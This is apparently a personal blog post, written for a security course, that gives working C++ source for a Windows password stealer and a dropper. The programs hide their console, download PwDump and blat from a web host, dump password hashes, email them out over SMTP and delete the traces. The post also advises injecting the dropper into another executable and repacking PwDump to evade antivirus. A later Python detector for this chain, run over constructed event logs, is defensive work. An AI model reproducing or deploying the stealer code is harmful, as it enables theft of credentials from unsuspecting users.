A crude but simple password stealer

As I have explained earlier, I’ve had to write a crude password stealer as part of an information security course.

The proper approach would have been to write the whole thing myself, with the hash dump and the SMTP sending built into one program. That would have taken quite a lot of time, though, and between work, studies and life I was not in the mood to write it from scratch. So I found myself looking at the available tools of the trade and how to use them.
I decided to do it with two very simple command-line tools. One is PwDump, a program that simply dumps the Windows password hashes. The other is blat, which despite its funny name (to us Russian speakers) is a very useful tool: it sends files from the command line over SMTP. If you don't see why you would need it, you have clearly never worked as a system administrator.

So, armed with those tools, I now had to find a way to combine them into a single executable, run them, and stay out of the user's sight.
My solution: write a C++ program that downloads both files from a web location and runs them with the system() call (I know there are better ways to do this, CreateProcess for one, but remember, I wanted a quick and dirty way to hand in my assignment).

So, I came up with this piece of code:

#include "stdafx.h"
#include <windows.h>   // GetConsoleWindow, ShowWindow
#include <tchar.h>
#include <urlmon.h>    // URLDownloadToFile
#include <cstdlib>     // system
#include <iostream>
using namespace std;

#pragma comment(lib, "urlmon.lib")

int _tmain(int argc, _TCHAR* argv[])
{
    // Hide our own console window so the user sees nothing.
    HWND hWnd = GetConsoleWindow();
    ShowWindow(hWnd, SW_HIDE);

    // Fetch the two tools over plain HTTP into the current directory.
    // Nothing verifies what comes back: whoever controls that URL (or the
    // network path to it) controls what gets executed next.
    HRESULT hr = URLDownloadToFile(NULL, _T("http://www.wasserman.me/blog/wp-content/uploads/2013/12/PwDump7.exe"), _T("Dump.exe"), 0, NULL);
    if (FAILED(hr)) return 1;
    hr = URLDownloadToFile(NULL, _T("http://www.wasserman.me/blog/wp-content/uploads/2013/12/blat.exe"), _T("Mail.exe"), 0, NULL);
    if (FAILED(hr)) return 1;

    // system() runs each line through cmd.exe and waits for it to finish,
    // so the dump is complete before it gets mailed.
    system("Dump.exe >> dump.txt");
    system("Mail.exe dump.txt -server smtpcorp.com:2525 -u ***** -pw ******** -f ******@*********.** -to *******@**********.***");

    return 0;
}

As you can see, it first hides the console window, then downloads PwDump and blat, runs them one after the other (system() hands each line to cmd.exe and waits for it to finish), and exits.
It's a rather simple piece of code, so I haven't even bothered to comment it.

The problem is that the stealer itself doesn't behave well when injected into another file: it still opens a console window for the dump and mail processes. (Processes started with system() share their parent's console when it has one; a GUI executable has no console, so cmd.exe gets a fresh, visible one for each command.) So, how do we get around that?
We write another program that runs the stealer itself. This program, the dropper, is even simpler, and here is how it looks:

#include "stdafx.h"
#include <windows.h>   // GetConsoleWindow, ShowWindow, Sleep
#include <tchar.h>
#include <urlmon.h>    // URLDownloadToFile
#include <cstdio>      // remove
#include <cstdlib>     // system
#include <iostream>
using namespace std;
#pragma comment(lib, "urlmon.lib")

int _tmain(int argc, _TCHAR* argv[])
{
	// Hide the dropper's console; the stealer and its children inherit it.
	HWND hWnd = GetConsoleWindow();
	ShowWindow( hWnd, SW_HIDE );

	// Fetch and run the stealer. system() blocks until stealer.exe exits,
	// and the stealer itself waits for Mail.exe, so the 30-second sleep is
	// only a safety margin before cleanup.
	HRESULT hr = URLDownloadToFile ( NULL, _T("http://www.wasserman.me/blog/wp-content/uploads/2013/12/stealer.exe"), _T("stealer.exe"), 0, NULL );
	if (FAILED(hr)) return 1;
	system("stealer.exe");
	Sleep(30000);

	// Remove everything the stealer left behind in the working directory.
	remove("stealer.exe");
	remove("Dump.exe");
	remove("Mail.exe");
	remove("dump.txt");
	return 0;
}

So, what now? Inject the dropper into another EXE and let it run; it will clean up after itself.
The caveat is that you have to run said EXE as an administrator, since dumping the hashes means reading the SAM, which needs an elevated administrator token (a standard user, or an administrator still sitting behind the UAC prompt, gets nothing). But I'm sure you can overcome that hurdle.
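Seen from the other side of the fence, the chain above is not exactly subtle: the same parent process spawns one cmd.exe that redirects a program's output into a .txt file and another that hands that file to a mailer with -server/-to, a descendant then connects out to an SMTP port, and a related process deletes the file shortly after. The script below is an added example for this post, not code from it (and not part of PwDump or blat): a small Python detector that runs that correlation over constructed Sysmon-style events. The event dicts, their field names (id, pid, ppid, image, cmdline, dst_port, target), the paths and the mail host are all assumptions made for the example; with real Sysmon data you would map Event ID 1, 3 and 23 onto the same fields.

```python
"""Spot the dump-then-mail chain from Sysmon-style events.

Added example for this post, not code from it. The event dicts are a
constructed, simplified stand-in for Sysmon Event ID 1 (process create),
3 (network connect) and 23 (file delete); the field names are assumptions.
"""
import re

MAIL_PORTS = {25, 465, 587, 2525}
# system("X.exe >> file.txt") always goes through cmd.exe, so the redirection
# shows up in cmd.exe's own command line.
REDIRECT_RE = re.compile(r'>>?\s*"?([^\s"]+\.txt)', re.IGNORECASE)
# blat-style invocation: <file> -server host[:port] ... -to <address>
MAIL_RE = re.compile(r"-server\s+\S+.*-to\s+\S+", re.IGNORECASE)


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def detect(events):
    """One finding per process whose children both redirected a dump and mailed something."""
    parent_of = {e["pid"]: e["ppid"] for e in events if e["id"] == 1}

    def ancestors(pid):
        chain = []
        while pid in parent_of:
            pid = parent_of[pid]
            chain.append(pid)
        return chain

    def related(pid, root):
        return pid == root or root in ancestors(pid) or pid in ancestors(root)

    dump_by_parent = {}  # ppid -> file a cmd.exe child redirected output into
    mail_by_parent = {}  # ppid -> command line of a mailer child
    for e in events:
        if e["id"] != 1:
            continue
        if basename(e["image"]) == "cmd.exe":
            m = REDIRECT_RE.search(e["cmdline"])
            if m:
                dump_by_parent[e["ppid"]] = m.group(1).lower()
        if MAIL_RE.search(e["cmdline"]):
            mail_by_parent[e["ppid"]] = e["cmdline"].lower()

    findings = []
    for root, dump_file in dump_by_parent.items():
        mail_cmd = mail_by_parent.get(root)
        if mail_cmd is None:
            continue  # redirection on its own is everyday admin activity
        indicators = [
            f"child cmd.exe redirected a program's output into {dump_file}",
            "sibling process mails a file with -server/-to (blat-style)",
        ]
        if dump_file in mail_cmd:
            indicators.append(f"the mailed file is {dump_file}")
        for e in events:
            if e["id"] == 3 and e["dst_port"] in MAIL_PORTS and related(e["pid"], root):
                indicators.append(f"pid {e['pid']} connected out to port {e['dst_port']}")
            elif e["id"] == 23 and basename(e["target"]) == dump_file and related(e["pid"], root):
                indicators.append(f"pid {e['pid']} deleted {dump_file} afterwards")
        findings.append({"root_pid": root, "dump_file": dump_file, "indicators": indicators})
    return findings


CMD = r"C:\Windows\System32\cmd.exe"
DL = r"C:\Users\bob\Downloads"
# Constructed events: dropper -> cmd -> stealer -> (cmd -> Dump.exe, cmd -> Mail.exe),
# plus an unrelated admin batch job that also redirects output into a .txt file.
SAMPLE_EVENTS = [
    {"id": 1, "pid": 400, "ppid": 1, "image": DL + r"\dropper.exe", "cmdline": "dropper.exe"},
    {"id": 1, "pid": 410, "ppid": 400, "image": CMD, "cmdline": "cmd.exe /c stealer.exe"},
    {"id": 1, "pid": 420, "ppid": 410, "image": DL + r"\stealer.exe", "cmdline": "stealer.exe"},
    {"id": 1, "pid": 430, "ppid": 420, "image": CMD, "cmdline": "cmd.exe /c Dump.exe >> dump.txt"},
    {"id": 1, "pid": 431, "ppid": 430, "image": DL + r"\Dump.exe", "cmdline": "Dump.exe"},
    {"id": 1, "pid": 440, "ppid": 420, "image": CMD, "cmdline": "cmd.exe /c Mail.exe dump.txt "
     "-server smtp.example.test:2525 -u user -pw secret -f a@example.test -to b@example.test"},
    {"id": 1, "pid": 441, "ppid": 440, "image": DL + r"\Mail.exe", "cmdline": "Mail.exe dump.txt "
     "-server smtp.example.test:2525 -u user -pw secret -f a@example.test -to b@example.test"},
    {"id": 3, "pid": 441, "image": DL + r"\Mail.exe", "dst_port": 2525},
    {"id": 23, "pid": 400, "image": DL + r"\dropper.exe", "target": DL + r"\dump.txt"},
    {"id": 1, "pid": 500, "ppid": 1, "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
    {"id": 1, "pid": 510, "ppid": 500, "image": CMD, "cmdline": "cmd.exe /c ipconfig /all >> net.txt"},
]

if __name__ == "__main__":
    for f in detect(SAMPLE_EVENTS):
        print(f"ALERT root pid {f['root_pid']} ({f['dump_file']}):")
        for line in f["indicators"]:
            print("  -", line)
```

Run as-is it raises one alert, for the stealer process, with all five indicators, and stays quiet about the ipconfig job, because the alert only fires once a redirected dump and a mailer share the same parent; the network connection and the cleanup delete just add weight. The dropper's 30-second sleep is what makes the file-delete event line up so neatly after the mail connection.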

If, for some crazy and insane reason, you want to use this code yourself, you will want to obfuscate or repack PwDump, since every AV will stop the stock binary from running. Also keep in mind that the download URLs and the full SMTP login, password included, sit as plain strings inside the executable, so anyone who gets hold of it can pull them out with a strings tool and help themselves to your mailbox.

So, there you go, a very simple password stealer written in less than 15 minutes, including time spent drinking coffee and contemplating my non-existent love life.
